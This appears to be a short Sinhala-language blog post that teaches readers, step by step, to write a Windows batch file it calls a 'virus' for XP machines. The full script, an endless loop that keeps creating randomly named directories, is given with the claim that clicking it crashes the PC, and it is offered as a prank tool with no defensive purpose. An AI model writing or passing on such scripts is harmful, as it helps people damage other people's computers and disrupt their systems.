පට්ටම virus එකක් .................


මම අද ඔයාලට කියල දෙන්න යන virus එක පට්ට බලන්න කරලා එහෙනම් 
මේකන් Xp use කරන machine එකකට ගොඩක් හානිකරන virus එකක් හදන්න පුළුවන් වෙනවා මෙමගින් pc එක crash වෙනු ලබයි .
දැන් අපි බලමු පියවරින් පියවර කරන්නේ කොහොමද කියලා .

මුලින්ම @echo off ලෙසට type කරන්න . 
දැන් enter කර next line එකට යන්න .
දැන් මෙන්න මෙහෙම type කරන්න. : hell 
දැන් කරන්න තියෙන්නේ next Line එකට ගිහින් md %random% ලෙසට type කරන්න. 
දැන් next Line එකට එන්න දැන් මෙන්න මෙහෙම type කරන්න . 
goto hell 
දැන් ඉවරයි දැන් file එක save කරගන්න .bet extention එකත් සමගින් .

අදාල කේතය පහත පරිදිය .

@echo off
: hell
md %random%
goto hell

දැන් එම .bat file එක click කරවිට virus එක infect වෙයි . දැන් XP OS සහිත PC එක crash වෙනු ලබයි .
බලගෙන

0 අදහස්: